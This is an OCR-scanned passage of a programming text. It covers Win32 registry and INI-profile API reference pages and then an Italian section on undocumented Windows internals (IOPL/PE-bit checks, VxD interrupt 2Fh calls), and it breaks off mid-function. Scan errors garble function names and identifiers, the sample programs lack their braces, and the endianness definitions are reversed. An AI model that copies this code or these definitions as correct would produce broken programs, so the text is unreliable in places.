Windows NT: The calling process must have the SE_RESTORE_NAME privilege. For 
more information about privileges, see Privileges. 

Windows 95: Security privileges are not supported or required. 

See Also 


RegConnectRegistry, RegDeleteKey, RegReplaceKey, RegRestoreKey 


RegOpenKey 


The RegOpenKey function opens the specified key. This function is provided for 
compatibility with Windows version 3.1. Win32-based applications should use the 
RegOpenKeyEx function. 


LONG RegOpenKey( 
HKEY hKey, // handle of open key 


LPCTSTR lpSubKey, // address of name of subkey to open 
PHKEY phkResult // address of handle of open key 


); 
Parameters 
hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 


The key opened by the RegOpenkey function is a subkey of the key identified by 
hKey. 


lpSubKey 

Points to a null-terminated string containing the name of the key to open. This 
key must be a subkey of the key identified by the hKey parameter. If this 
parameter is NULL or a pointer to an empty string, the function returns the same 
handle that was passed in. 

phkResult 

Points to a variable that receives the handle of the opened key. 


Return Values 


If the function succeeds, the return value is ERROR_SUCCESS, 


If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 
Remarks 


The RegOpenKey function uses the default security access mask to open a key. If 
opening the key requires a different mask, the function fails, returning 
ERROR_ACCESS_DENIED. An application should use the RegOpenKeyEx function to 
specify an access mask in this situation. 


Unlike the RegCreateKey function, RegOpenKkey does not create the specified key 
if the key does not exist in the database. 


See Also 

RegCloseKey, RegCreateKkey, RegCreateKeyEx, RegbeleteKey 
RegOpenKeyEx 

The RegOpenKeyEx function opens the specified key. 

LONG RegOpenKeyEx( 

HKEY hKey, // handle of open key 

LPCTSTR lpSubKey, // address of name of subkey to open 
DWORD ulOptions, // reserved 


REGSAM samDesired, // security access mask 
PHKEY phkResult // address of handle of open key 


); 
Parameters 
hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 

HKEY_CURRENT_USER 

HKEY_LOCAL_MACHINE 

HKEY_USERS 

lpSubKey 

Points to a null-terminated string containing the name of the subkey to open. If 
this parameter is NULL or a pointer to an empty string, the function will open a 
new handle of the key identified by the hkey parameter. In this case, the 
function will not close the handles previously opened. 

ulOptions 

Reserved; must be zero. 


samDesired 


Specifies an access mask that describes the desired security access for the new 
key. This parameter can be a combination of the following values: 


KEY_ALL_ACCESS 


Combination of KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, KEY_NOTIFY, 
KEY_CREATE_SUB_KEY, KEY_CREATE_LINK, and KEY_SET_VALUE access. 


KEY_CREATE_LINK 
Permission to create a symbolic link. 


KEY_CREATE_SUB_KEY 
Permission to create subkeys. 


KEY_ENUMERATE_SUB_KEYS 
Permission to enumerate subkeys. 


KEY_EXECUTE 
Permission for read access. 


KEY_NOTIFY 
Permission for change notification. 


KEY_QUERY_VALUE 
Permission to query subkey data. 


KEY_READ 
Combination of KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, and KEY_NOTIFY access. 


KEY_SET_VALUE 
Permission to set subkey data. 


KEY_WRITE 
Combination of KEY_SET_VALUE and KEY_CREATE_SUB_KEY access. 


phkResult 

Points to a variable that receives the handle of the opened key. 

Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 
Remarks 

Unlike the RegCreateKeyEx function, the RegOpenKeyEx function does not create 
the specified key if the key does not exist in the registry. 


See Also 


RegCloseKey, RegCreateKeyEx, RegDeleteKkey, RegOpenKey 


RegQueryValue 


The RegQueryValue function retrieves the value associated with the unnamed value 
for a specified key in the registry. Values in the registry have name, type, and 
data components. This function retrieves the data for a key's first value that 
has a NULL name. This function is provided for compatibility with Windows 
version 3.1. Win32-based applications should use the RegQueryValueEx function. 


LONG RegQueryVvalue( 


HKEY hKey, // handle of key to query 

LPCTSTR lpSubKey, // address of name of subkey to query 
LPTSTR lpvalue, // address of buffer for returned string 
PLONG lpcbValue // address of buffer for size of returned string 


); 
Parameters 
hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 


lpSubKey 


Points to a null-terminated string containing the name of the subkey of the hKey 
parameter for which a value is to be retrieved. If this parameter is NULL or 
points to an empty string, the function retrieves the value set by the 
RegSetValue function for the key identified by hKey. 


lpValue 


Points to a buffer that receives the value associated with the 1pSubKey 
parameter. The buffer should be big enough to contain the terminating null 
character. This parameter can be NULL if the data is not required. 


If lpValue is NULL, and lpcbValue is not NULL, the function places the size in 
bytes of the data referenced by the value key, including the terminating null 
character, into the variable pointed to by lpcbVvalue. This lets an application 
determine how to best preallocate a buffer for the value key's data. 


lpcbValue 


Points to a variable specifying the size, in bytes, of the buffer pointed to by 
the lpValue parameter. when the function returns, this variable contains the 
size of the data copied to lpValue, including the terminating null character. 


If the buffer specified by lpValue parameter is not large enough to hold the 
data, the function returns the value ERROR_MORE_DATA, and stores the required 
buffer size, in bytes, into the variable pointed to by lpcbvalue. 


If lpValue is NULL, the function returns ERROR_SUCCESS, and stores the size of 
the string, in bytes, into the variable pointed to by lpcbValue. This lets an 
application determine the best way to allocate a buffer for the value key's 
data. 


In all cases the value returned in lpchValue always includes the size of the 
terminating null character in the string. 


Return Values 
If the function succeeds, the return value is ERROR_SUCCESS, 
If the function fails, the return value is a nonzero error code defined in 


WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


The key identified by the hKey parameter must have been opened with 
KEY_QUERY_VALUE access (KEY_READ access includes KEY_QUERY_VALUE access). 


If the ANSI version of this function is used (either by explicitly calling 
RegQueryValue or by not defining Unicode before including the WINDOWS.H file), 
this function converts the stored Unicode string to an ANSI string before 
copying it to the buffer specified by the lpValue parameter. 

See Also 


RegEnumKey, RegEnumKeyEx, RegEnumValue, RegQueryInfoKey, RegQueryValueEx, 
RegSetValue, RegSetValueEx 


RegQueryValueEx 


The RegQueryValueEx function retrieves the type and data for a specified value 
name associated with an open registry key. 


LONG RegQueryValueEx( 


HKEY hKey, // handle of key to query 

LPTSTR lpValueName, // address of name of value to query 
LPDWORD lpReserved, // reserved 

LPDWORD lpType, // address of buffer for value type 

LPBYTE lpData, // address of data buffer 

LPDWORD lpcbData // address of data buffer size 

); 

Parameters 

hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 


HKEY_LOCAL_MACHINE 
HKEY_USERS 


lpValueName 


Points to a null-terminated string containing the name of the value to be 
queried. 


lpReserved 
Reserved; must be NULL. 
lpType 


Points to a variable that receives the key's value type. The value returned 
through this parameter will be one of the following: 


REG_BINARY 
Binary data in any form. 


REG_DWORD 
A 32-bit number. 


REG_DWORD_LITTLE_ENDIAN 

A 32-bit number in little-endian format (same as REG _DWORD). In little-endian 
format, the most significant byte of a word is the high-order byte. This is the 
most common format for computers running Windows NT and Windows 95. 


REG_DWORD_BIG_ENDIAN 
A 32-bit number in big-endian format. In big-endian format, the most significant 
byte of a word is the low-order byte. 


REG_EXPAND_SZ 

A null-terminated string that contains unexpanded references to environment 
variables (for example, "%PATH%"). It will be a Unicode or ANSI string depending 
on whether you use the Unicode or ANSI functions. 


REG_LINK 
A Unicode symbolic link. 


REG_MULTI_SZ 
An array of null-terminated strings, terminated by two null characters. 


REG_NONE 
No defined value type. 


REG_RESOURCE_LIST 
A device-driver resource list. 


REG_SZ 
A null-terminated string. It will be a Unicode or ANSI string depending on 
whether you use the Unicode or ANSI functions. 


The lpType parameter can be NULL if the type is not required. 
lpData 


Points to a buffer that receives the value's data. This parameter can be NULL if 
the data is not required. 


lpcbData 


Points to a variable that specifies the size, in bytes, of the buffer pointed to 
by the lpData parameter. when the function returns, this variable contains the 
size of the data copied to lpData. 


If the buffer specified by lpData parameter is not large enough to hold the 
data, the function returns the value ERROR_MORE_DATA, and stores the required 
buffer size, in bytes, into the variable pointed to by lpcbData. 


If lpData is NULL, and lpcbData is non-NULL, the function returns ERROR_SUCCESS, 
and stores the size of the data, in bytes, in the variable pointed to by 
lpcbData. This lets an application determine the best way to allocate a buffer 
for the value key's data. 


If the data has the REG_ SZ, REG MULTI_SZ or REG_EXPAND_SZ type, then lpData will 
also include the size of the terminating null character. 


The lpcbData parameter can be NULL only if lpData is NULL. 
Return Values 
If the function succeeds, the return value is ERROR_SUCCESS, 


If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


The key identified by hKey must have been opened with KEY_QUERY_VALUE access. To 
open the key, use the RegCreateKeyEx or RegOpenKeyEx function. 


This function does not expand the environment-variable names in the value data 
when the value type is REG_EXPAND_SZ. The ExpandEnvironmentStrings function can 
be used to expand the environment-variable names. 


If the value data has the REG_SZ, REG_MULTI_SZ or REG_EXPAND_SZ type, and the 
ANSI version of this function is used (either by explicitly calling 
RegQueryValueEx or by not defining Unicode before including the WINDOWS.H file), 
this function converts the stored Unicode string to an ANSI string before 
copying it to the buffer pointed to by lpData. 


when calling the RegQueryValueEx function with hkey set to the 
HKEY_PERFORMANCE_DATA handle and a value string of a specified object, the 
returned data structure sometimes has unrequested objects. Don't be surprised; 
this is normal behavior. When calling the RegQueryValueEx function, you should 
always expect to walk the returned data structure to look for the requested 
object. 


See Also 
ExpandEnvironmentStrings, RegCreateKeyEx, RegEnumKey, RegEnumKeyEx, 
RegEnumValue, RegOpenKeyEx 


RegSaveKey 


The RegSaveKey function saves the specified key and all of its subkeys and 
values to a new file. 


LONG RegSaveKey( 


HKEY hKey, // handle of key where save begins 

LPCTSTR lpFile, // address of filename to save to 

LPSECURITY_ATTRIBUTES lpSecurityAttributes // address of security structure 
); 

Parameters 

hKey 


Specifies a handle of the key where the save operation is to begin, or any of 
the following predefined reserved handle values: 


HKEY_CLASSES_ROOT 


HKEY_CURRENT_USER 

HKEY_LOCAL_MACHINE 

HKEY_USERS 

lpFile 

Points to a null-terminated string containing the name of the file in which the 
specified key and subkeys are saved. 


If this filename includes an extension, it cannot be used on file allocation 
table (FAT) file systems by the RegLoadKey, RegReplaceKey, or RegRestoreKey 
function. 


Windows NT: If the file already exists, the function fails with the 
ERROR_ALREADY_EXISTS error. 


Windows 95: If the file already exists, the function fails with the 
ERROR_REGISTRY_IO_FAILED error. 


Windows NT: If the string does not include a path, the file is created in the 


current directory of the calling process for a local key, or in the 
%systemroot%\system32 directory for a remote key. 


Windows 95: If the string does not include a path, the file is created in the 
Windows root directory for local and remote keys. See GetWindowsDirectory. 
lpSecurityAttributes 

Windows NT: Pointer to a SECURITY_ATTRIBUTES structure that specifies a security 
descriptor for the new file. If lpSecurityAttributes is NULL, the file gets a 
default security descriptor. 

Windows 95: This parameter is ignored. 

Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


If hKey represents a key on a remote computer, the path described by lpFile is 
relative to the remote computer. 


The RegSaveKey function saves only nonvolatile keys. It does not save volatile 
keys. A key is made volatile or nonvolatile at its creation; see RegCreateKeyEx. 
Windows 95: The new file has the archive, hidden, readonly, and system 
attributes. 


Windows NT: The new file has the archive attribute. 


Windows NT: The calling process must have the SE_BACKUP_NAME privilege. For more 
information about privileges, see Privileges. 


Windows 95: Security privileges are not supported or required. 


See Also 

RegCreateKeyEx, RegDeleteKey, RegLoadKey, RegReplaceKey 

RegSetValueEx 

The RegSetValueEx function stores data in the value field of an open registry 
key. It can also set additional value and type information for the specified 


key. 


LONG RegSetValueEx( 


HKEY hKey, // handle of key to set value for 
LPCTSTR lpValueName, // address of value to set 
DWORD Reserved, // reserved 

DWORD dwType, // flag for value type 

CONST BYTE *1lpData, // address of value data 
DWORD cbData // size of value data 

); 

Parameters 

hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 
lpValueName 


Points to a string containing the name of the value to set. If a value with this 
name is not already present in the key, the function adds it to the key. 


If this parameter is NULL or points to an empty string and the dwType parameter 
is the REG_SZ type, this function sets the same value the RegSetValue function 
would set. 

Reserved 

Reserved; must be zero. 


dwType 


Specifies the type of information to be stored as the value's data. This 
parameter can be one of the following values: 


REG_BINARY 
Binary data in any form. 


REG_DWORD 
A 32-bit number. 


REG_DWORD_LITTLE_ENDIAN 

A 32-bit number in little-endian format (same as REG _DWORD). In little-endian 
format, the most significant byte of a word is the high-order byte. This is the 
most common format for computers running Windows NT and Windows 95. 


REG_DWORD_BIG_ENDIAN 
A 32-bit number in big-endian format. In big-endian format, the most significant 
byte of a word is the low-order byte. 


REG_EXPAND_SZ 

A null-terminated string that contains unexpanded references to environment 
variables (for example, "%PATH%"). It will be a Unicode or ANSI string depending 
on whether you use the Unicode or ANSI functions. 


REG_LINK 
A Unicode symbolic link. 


REG_MULTI_SZ 
An array of null-terminated strings, terminated by two null characters. 


REG_NONE 
No defined value type. 


REG_RESOURCE_LIST 
A device-driver resource list. 


REG_SZ 
A null-terminated string. It will be a Unicode or ANSI string depending on 
whether you use the Unicode or ANSI functions. 


lpData 


Points to a buffer containing the data to be stored with the specified value 
name. 


cbData 


Specifies the size, in bytes, of the information pointed to by the lpData 
parameter. If the data is of type REG_SZ, REG_EXPAND_SZ, or REG MULTI_SZ, chbData 
must include the size of the terminating null character. 


Return Values 
If the function succeeds, the return value is ERROR_SUCCESS, 


If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


Value lengths are limited by available memory. Long values (more than 2048 
bytes) should be stored as files with the filenames stored in the registry. This 
helps the registry perform efficiently. Application elements such as icons, 
bitmaps, and executable files should be stored as files and not be placed in the 
registry. 


The key identified by the hKey parameter must have been opened with 
KEY_SET_VALUE access. To open the key, use the RegCreateKeyEx or RegOpenKeyEx 
function. 


If dwType is the REG_SZ, REG _MULTI_SZ or REG_EXPAND_SZ type and the ANSI version 
of this function is used (either by explicitly calling RegSetValueEx or by not 
defining Unicode before including the WINDOWS.H file), the data pointed to by 
the lpData parameter must be an ANSI character string. The string is converted 
to Unicode before it is stored in the registry. 


See Also 


RegCreateKeyEx, RegFlushKey, RegOpenKeyEx, RegQueryValue 


RegSetValue 


The RegSetValue function associates a value with a specified key. This value 
must be a text string and cannot have a name. This function is provided for 
compatibility with Windows version 3.1. Win32-based applications should use the 
RegSetValueEx function, which allows an application to set any number of named 
values of any data type. 


LONG RegSetValue( 


HKEY hKey, // handle of key to set value for 
LPCTSTR lpSubKey, // address of subkey name 
DWORD dwType, // type of value 

LPCTSTR lpData, // address of value data 

DWORD cbData // size of value data 

); 

Parameters 

hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 

HKEY_CURRENT_USER 

HKEY_LOCAL_MACHINE 

HKEY_USERS 

lpSubKey 

Points to a null-terminated string containing the name of the subkey with which 
a value is associated. This parameter can be null or a pointer to an empty 


string. In this case, the value will be added to the key identified by the hKey 
parameter. 


dwType 


Specifies the type of information to be stored. This parameter must be the 
REG_SZ type. To store other data types, use the RegSetValueEx function. 


lpData 


Points to a null-terminated string containing the value to set for the specified 
key. 


cbData 


Specifies the length, in bytes, of the string pointed to by the lpData 
parameter, not including the terminating null character. 


Return Values 


If the function succeeds, the return value is ERROR_SUCCESS, 


If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


If the key specified by the lpSubKey parameter does not exist, the RegSetValue 
function creates it. 


Value lengths are limited by available memory. Long values (more than 2048 
bytes) should be stored as files with the filenames stored in the registry. This 
helps the registry perform efficiently. 


The key identified by the hKey parameter must have been opened with 
KEY_SET_VALUE access. To open the key, use the RegCreateKkeyEx or RegOpenKeyEx 
function. If the ANSI version of this function is used (either by explicitly 
calling RegSetValue or by not defining Unicode before including the WINDOWS.H 
file), the lpData parameter must be an ANSI character string. The string is 
converted to Unicode before it is stored in the registry. 


See Also 


RegCreateKeyEx, RegFlushKey, RegOpenKeyEx, RegQueryValue 


WritePrivateProfileString 


The WritePrivateProfileString function copies a string into the specified 
section of the specified initialization file. 


This function is provided for compatibility with 16-bit Windows-based 
applications. WIn32-based applications should store initialization information 
in the registry. 


BOOL WritePrivateProfileString( 


LPCTSTR lpAppName, // pointer to section name 

LPCTSTR lpKeyName, // pointer to key name 

LPCTSTR lpString, // pointer to string to add 

LPCTSTR lpFileName // pointer to initialization filename 
); 

Parameters 

lpAppName 


Points to a null-terminated string containing the name of the section to which 
the string will be copied. If the section does not exist, it is created. The 
name of the section is case-independent; the string can be any combination of 
uppercase and lowercase letters. 


lpKeyName 


Points to the null-terminated string containing the name of the key to be 
associated with a string. If the key does not exist in the specified section, it 
is created. If this parameter is NULL, the entire section, including all entries 
within the section, is deleted. 

lpString 


Points to a null-terminated string to be written to the file. If this parameter 
is NULL, the key pointed to by the lpKeyName parameter is deleted. 


Windows 95: This platform does not support the use of the TAB (\t) character as 
part of this parameter. 

lpFileName 

Points to a null-terminated string that names the initialization file. 

Return Values 


If the function successfully copies the string to the initialization file, the 
return value is nonzero. 


If the function fails, or if it flushes the cached version of the most recently 
accessed initialization file, the return value is zero. To get extended error 
information, call GetLasteError. 


Remarks 

Windows 95: 

Windows 95 keeps a cached version of WIN.INI to improve performance. If all 
three parameters are NULL, the function flushes the cache. The function always 


returns FALSE after flushing the cache, regardless of whether the flush succeeds 
or fails. 


A section in the initialization file must have the following form: 


[section] 
key=string 


If the lpFileName parameter does not contain a full path and filename for the 
file, WritePrivateProfileString searches the Windows directory for the file. If 
the file does not exist, this function creates the file in the Windows 
directory. 


If lpFileName contains a full path and filename and the file does not exist, 
WriteProfileString creates the file. The specified directory must already exist. 
Windows NT: 


Windows NT maps most .INI file references to the registry, using the mapping 
defined under the following registry key: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping 


Windows NT keeps a cache for the IniFileMapping registry key. Calling 
WritePrivateProfileStringw with the value of all arguments set to NULL will 
cause Windows NT to refresh its cache of the IniFileMappingKey for the specified 
.INI file. 


The Win32 Profile functions (Get/WriteProfile*, Get/WritePrivateProfile*) use 
the following steps to locate initialization information: 


1. Look in the registry for the name of the initialization file, say myfile.ini, 
under IniFileMapping: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping\myfile.ini 


2. Look for the section name specified by lpAppName. This will be a named value 
under myfile.ini, or a subkey of myfile.ini, or will not exist. 


3. If the section name specified by lpAppName is a named value under myfile.ini, 
then that value specifies where in the registry you will find the keys for the 
section. 


4. If the section name specified by lpAppName is a subkey of myfile.ini, then 
named values under that subkey specify where in the registry you will find the 
keys for the section. If the key you are looking for does not exist as a named 
value, then there will be an unnamed value (shown as "<No Name>") that specifies 
the default location in the registry where you will find the key. 


5. If the section name specified by lpAppName does not exist as a named value or 
as a subkey under myfile.ini, then there will be an unnamed value (shown as "<No 
Name>") under myfile.ini that specifies the default location in the registry 
where you will find the keys for the section. 


6. If there is no subkey for myfile.ini, or if there is no entry for the section 
name, then look for the actual myfile.ini on the disk and read its contents. 


when looking at values in the registry that specify other registry locations, 
there are several prefixes that change the behavior of the ini file mapping: 


! - this character forces all writes to go both to the registry and to the .INI 
file on disk. 


# - this character causes the registry value to be set to the value in the 
Windows 3.1 .INI file when a new user logs in for the first time after setup. 
@ - this character prevents any reads from going to the .INI file on disk if the 


requested data is not found in the registry. 


USR: - this prefix stands for HKEY_CURRENT_USER, and the text after the prefix 
is relative to that key. 


SYS: - this prefix stands for HKEY_LOCAL _MACHINE\SOFTWARE, and the text after 
the prefix is relative to that key. 


An application using the WritePrivateProfileStringwW function to enter .INI file 
information into the registry should follow these guidelines: 


Ensure that no .INI file of the specified name exists on the system. 


Ensure that there is a key entry in the registry that specifies the .INI file. 
This entry should be under the path HKEY_LOCAL_MACHINE\SOFTWARE 
\Microsoft\Windows NT\CurrentVersion\IniFileMapping. 


Specify a value for that .INI file key entry that specifies a section. That is 
to say, an application must specify a section name, as it would appear within an 
.INI file or registry entry. Here is an example: [My Section]. 


For system files, specify SYS for an added value. 


For application files, specify USR within the added value. Here is an example: 
"My Section: USR: App Name\Section". And, since USR indicates a mapping under 
HKEY_CURRENT_USER, the application should also create a key under 
HKEY_CURRENT_USER that specifies the application name listed in the added value. 
For the example just given, that would be "App Name". 


+ After following the preceding steps, an application setup program should call 
WritePrivateProfileStringW with the first three parameters set to NULL, and the 
fourth parameter set to the INI filename. For example: 


WritePrivateProfileStringw( NULL, NULL, NULL, L'appname.ini" ); 


Such a call causes the mapping of an .INI file to the registry to take effect 
before the next system reboot. The operating system re-reads the mapping 
information into shared memory. A user will not have to reboot their computer 
after installing an application in order to have future invocations of the 
application see the mapping of the .INI file to the registry. 


The following sample code illustrates the preceding guidelines and is based on 
several assumptions: 
. There is an application named "App Name." 
. That application uses an .INI file named "appname.ini." 
. There is a section in the .INI file that we want to look like this: 
[Section1] 

FirstKey = It all worked out okay. 


SecondKey = By golly, it works. 
ThirdKey = Another test. 


+ The user will not have to reboot the system in order to have future 
invocations of the application see the mapping of the .INI file to the registry. 


Here is the sample code 


// include files 
#include <stdio.h> 
#include <windows.h> 


// a main function 
main() 


// local variables 


CHAR inBuf[80]; 

HKEY hKey1, hKey2; 
DWORD dwDbisposition; 
LONG lRetCode; 


// try to create the .INI file key 
lRetCode = RegCreateKeyEx ( HKEY_LOCAL_ MACHINE, 
"SOFTWARE\\Microsoft\\Windows NT 
\\CurrentVersion\\IniFileMapping\\appname.ini", 
0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, 


NULL, &hKey1, 
&dwDisposition); 


// if we failed, note it, and leave 

if (lRetCode != ERROR_SUCCESS){ 
printf ("Error in creating appname.ini key\n"); 
return (0) ; 


// try to set a section value 
lRetCode = RegSetValueEx ( hKey1, 
"Section1", 
0, 
REG_SZ, 
"USR:App Name\\Sectionl", 


20); 


// if we failed, note it, and leave 

if (lRetCode != ERROR_SUCCESS) { 
printf ( "Error in setting Sectioni value\n"); 
return (0) ; 


// try to create an App Name key 
lRetCode = RegCreateKeyEx ( HKEY_CURRENT_USER, 
"App Name", 
0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, 
NULL, &hKey2, 
&dwDisposition); 


// if we failed, note it, and leave 

if (lRetCode != ERROR_SUCCESS) { 
printf ("Error in creating App Name key\n"); 
return (0) ; 


// force the operating system to re-read the mapping into shared memory 
// so that future invocations of the application will see it 

// without the user having to reboot the system 
WritePrivateProfileStringw( NULL, NULL, NULL, L'appname.ini" ); 


// if we get this far, all has gone well 
// let's write some added values 


WritePrivateProfileString ("Section1", "FirstKey", 
"It all worked out okay.", "appname.ini"); 
WritePrivateProfileString ("Section1", "SecondKey", 
"By golly, it works.", "appname.ini"); 
WritePrivateProfileSection ("Section1", "ThirdKkey = Another Test.", 
"appname.ini"); 


// let's test our work 
GetPrivateProfileString ("Section1", "FirstKkey", 
"Bogus Value: Get didn't work", inBuf, 80, 


"appname.ini"); 
printf ("%s", inBuf); 


// okay, we are outta here 
return(0); 


See Also 

GetPrivateProfileString 

GetPrivateProfileSection 

The GetPrivateProfileSection function retrieves all of the keys and values for 
the specified section from an initialization file. This function is provided for 
compatibility with 16-bit applications written for Windows. Win32-based 
applications should store initialization information in the registry. 

Windows 95: 

The specified profile section must not exceed 32K. 

Windows NT: 


The specified profile section has no size limit. 


DWORD GetPrivateProfileSection( 


LPCTSTR lpAppName, // address of section name 

LPTSTR lpReturnedString, // address of return buffer 

DWORD nSize, // size of return buffer 

LPCTSTR lpFileName // address of initialization filename 
); 

Parameters 

lpAppName 


Points to a null-terminated string containing the section name in the 
initialization file. 


lpReturnedString 

Points to a buffer that receives the key name and value pairs associated with 
the named section. The buffer is filled with one or more null-terminated 
strings; the last string is followed by a second null character. 


nsize 


Specifies the size, in characters, of the buffer pointed to by the 
lpReturnedString parameter. 


Windows 95: 


The maximum buffer size is 32,767 characters. 


Windows NT: 
There is no maximum buffer size. 
lpFileName 


Points to a null-terminated string that names the initialization file. If this 
parameter does not contain a full path to the file, Windows searches for the 
file in the Windows directory. 


Return Values 


The return value specifies the number of characters copied to the buffer, not 
including the terminating null character. If the buffer is not large enough to 
contain all the key name and value pairs associated with the named section, the 
return value is equal to nSize minus two. 


Remarks 


The data in the buffer pointed to by the lpReturnedString parameter consists of 
one or more null-terminated strings, followed by a final null character. Each 
string has the following format: 


key=string 


The GetPrivateProfileSection function is not case-sensitive; the string pointed 
to by the lpAppName parameter can be a combination of uppercase and lowercase 
letters. 


This operation is atomic; no updates to the specified initialization file are 
allowed while the key name and value pairs for the section are being copied to 
the buffer pointed to by the lpReturnedString parameter. 


Windows NT: 


Calls to private profile functions may be mapped to the registry instead of to 
the specified initialization files. This mapping occurs when the initialization 
file and section are specified in the registry under the following keys: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping 


This mapping is likely if an application modifies system-component 
initialization files, such as CONTROL.INI, SYSTEM.INI, and WINFILE.INI. In these 
cases, the GetPrivateProfileSection function retrieves information from the 
registry, not from the initialization file; the change in the storage location 
has no effect on the function's behavior. 


The Win32 Profile functions (Get/WriteProfile*, Get/WwritePrivateProfile*) use 
the following steps to locate initialization information: 


1. Look in the registry for the name of the initialization file, say myfile.ini, 
under IniFileMapping: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping\myfile.ini 


2. Look for the section name specified by lpAppName. This will be a named value 
under myfile.ini, or a subkey of myfile.ini, or will not exist. 


3. If the section name specified by lpAppName is a named value under myfile.ini, 
then that value specifies where in the registry you will find the keys for the 
section. 


4. If the section name specified by lpAppName is a subkey of myfile.ini, then 
named values under that subkey specify where in the registry you will find the 
keys for the section. If the key you are looking for does not exist as a named 
value, then there will be an unnamed value (shown as "<No Name>") that specifies 
the default location in the registry where you will find the key. 


5. If the section name specified by lpAppName does not exist as a named value or 
as a subkey under myfile.ini, then there will be an unnamed value (shown as "<No 
Name>") under myfile.ini that specifies the default location in the registry 
where you will find the keys for the section. 


6. If there is no subkey for myfile.ini, or if there is no entry for the section 
name, then look for the actual myfile.ini on the disk and read its contents. 


when looking at values in the registry that specify other registry locations, 
there are several prefixes that change the behavior of the ini file mapping: 


! - this character forces all writes to go both to the registry and to the .INI 
file on disk. 


# - this character causes the registry value to be set to the value in the 
Windows 3.1 .INI file when a new user logs in for the first time after setup. 


@ - this character prevents any reads from going to the .INI file on disk if the 
requested data is not found in the registry. 


USR: - this prefix stands for HKEY_CURRENT_USER, and the text after the prefix 
is relative to that key. 

SYS: - this prefix stands for HKEY_LOCAL_MACHINE\SOFTWARE, and the text after 
the prefix is relative to that key. 

See Also 

GetProfileInt 

RegDeleteValue 


The RegDeleteValue function removes a named value from the specified registry 
key. 


LONG RegDbeleteValue( 


HKEY hKey, // handle of key 

LPCTSTR lpValueName // address of value name 
); 

Parameters 

hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 


lpValueName 


Points to a null-terminated string that names the value to remove. If this 
parameter is NULL or points to an empty string, the value set by the RegSetValue 
function is removed. 


Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


The key identified by the hkey parameter must have been opened with 
KEY_SET_VALUE access (KEY _WRITE access includes KEY_SET_VALUE access). 


See Also 


RegSetValue 


ALCUNI SEGRETI DI WINDOWS 


Fino ad ora le api viste erano relative alle funzioni documentate. 

Per motivi di mancata sicurezza nei confronti della possibilità di far rimenere 
presenti nelle successive versioni di Windows, alcune funzioni non sono state 
documentate. 

Qui ne vedremo alcune riportando anche i sorgenti C di alcune di loro. 


TESTA IL BIT PE (PROTECT ENABLE) NELLA MSW (Machine Status Word) 
/* bcc -2 pe.c */ 

#include <stdio.h> 

main() 


unsigned msw; 
unsigned iopl; 


asm pushf 

asm pop ax 

_asm shr ax, 12 

asm and ax, 3 

_asm mov word ptr iopl, ax 
printf("IOPL=%d\n", iopl); 


_asm Smsw ax /* Store Machine Status Word: low CRO */ 
_asm MOV MSw, ax 
printf("PE (protect enable) bit %s\n", 
(msw & 1) ? "SET" : "NOT set"); 
return (msw & 1); 


Virtual-8086 (V86) VxD APIs 


#include <stdio.h> 
#include <dos.h> 


typedef unsigned char BYTE; 


typedef unsigned short WORD; 
typedef unsigned long DWORD; 


typedef DWORD (far *FUNCPTR)(void); 


// call the Windows "Get Device Entry Point Address" function 
// Interrupt 2Fh Function 1684h 
FUNCPTR GetDeviceAPI(WORD vxd_id) 
{ 
_asm { 

push di 

push es 

xor di, di 

mov es, di 

mov ax, 1684h 

mov bx, vxd_id 

int 2fh 

mov ax, di 

mov dx, es 

pop es 

pop di 


} 
// return value in DX:AX 
} 


int IsEnhancedMode(void) 
{ 
_asm { 
mov ax, 1600h 
int 2fh 
